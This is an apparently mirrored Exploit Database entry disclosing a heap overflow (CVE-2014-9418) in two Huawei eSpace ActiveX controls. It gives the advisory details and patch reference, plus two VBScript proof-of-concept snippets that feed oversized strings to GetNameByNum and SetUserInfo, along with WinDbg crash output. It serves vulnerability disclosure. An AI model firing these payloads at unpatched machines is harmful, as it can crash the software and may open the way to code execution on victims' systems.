Huawei eSpace 1.1.11.103 – ‘ContactsCtrl.dll’ / ‘eSpaceStatusCtrl.dll’ ActiveX Heap Overflow

• Exploit Database
• 113 阅读

• 作者： LiquidWorm
  日期： 2019-05-20
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/46868/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86

  Huawei eSpace Meeting ContactsCtrl.dll and eSpaceStatusCtrl.dll ActiveX Heap Overflow     Vendor: Huawei Technologies Co., Ltd. Product web page: https://www.huawei.com Affected version: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC) eSpace UC V200R002C02   Summary: Create more convenient Enhanced Communications (EC) services for your enterprise with this suite of products. Huawei’s EC Suite (ECS) solution combines voice, data, video, and service streams, and provides users with easy and secure access to their service platform from any device, in any place, at any time. The eSpace Meeting allows you to join meetings that support voice, data, and video functions using the PC client, the tablet client, or an IP phone, or in a meeting room with an MT deployed.   Desc: eSpace Meeting suffers from a heap-based memory overflow vulnerability when parsing large amount of bytes to the &apos;strNum&apos; string parameter in GetNameyNum() in &apos;ContactsCtrl.dll&apos; and &apos;strName&apos; string parameter in SetUserInfo() in eSpaceStatusCtrl.dll library, resulting in heap memory corruption. An attacker can gain access to the system of the affected node and execute arbitrary code.   Vuln ActiveX controls: C:\Program Files\eSpace-ecs\ContactsCtrl.dll C:\Program Files\eSpace-ecs\eSpaceStatusCtrl.dll   Tested on: Microsoft Windows 7 Professional     Vulnerability discovered by Gjoko &apos;LiquidWorm&apos; Krstic   23.09.2014   Patched version: V200R001C03 Vuln ID: HWPSIRT-2014-1157 CVE ID: CVE-2014-9418 Advisory: https://www.huawei.com/en/psirt/security-advisories/hw-406589   --     ContactsCtrl.dll PoC and debug output:   <object classid=&apos;clsid:B53B93C2-6B0D-4D30-B46D-12F64E809B6D&apos; id=&apos;target&apos; /> <script language=&apos;vbscript&apos;> targetFile = "C:\Program Files\eSpace-ecs\ContactsCtrl.dll" prototype= "Function GetNameByNum ( ByVal strNum As String ) As String" memberName = "GetNameByNum" progid = "ContactsCtrlLib.ContactWnd" argCount = 1 arg1=String(616400, "A") target.GetNameByNum arg1   0:000> d esi 0417002441 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A. 0417003441 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A. 0417004441 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A. 0417005441 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A. 0417006441 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A. 0417007441 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A. 0417008441 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A. 0417009441 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.     eSpaceStatusCtrl.dll PoC and debug output:   <object classid=&apos;clsid:93A44D3B-7CED-454F-BBB4-EE0AA340BB78&apos; id=&apos;target&apos; /> <script language=&apos;vbscript&apos;> targetFile = "C:\Program Files\eSpace-ecs\eSpaceStatusCtrl.dll" prototype= "Sub SetUserInfo ( ByVal strAccount As String ,ByVal staffNo As String ,ByVal strName As String ,ByVal status As Long )" memberName = "SetUserInfo" progid = "eSpaceStatusCtrlLib.StatusCtrl" argCount = 4 arg1="defaultV" arg2="defaultV" arg3=String(14356, "A") arg4=1 target.SetUserInfo arg1 ,arg2 ,arg3 ,arg4   0:005> r eax=feeefeee ebx=02813550 ecx=feeefeee edx=feeefeee esi=0281369c edi=02813698 eip=776def10 esp=029dfd60 ebp=029dfd74 iopl=0 nv up ei ng nz ac po cy cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010293 ntdll!RtlEnterCriticalSection+0x4a: 776def10 83790800cmp dword ptr [ecx+8],0ds:0023:feeefef6=????????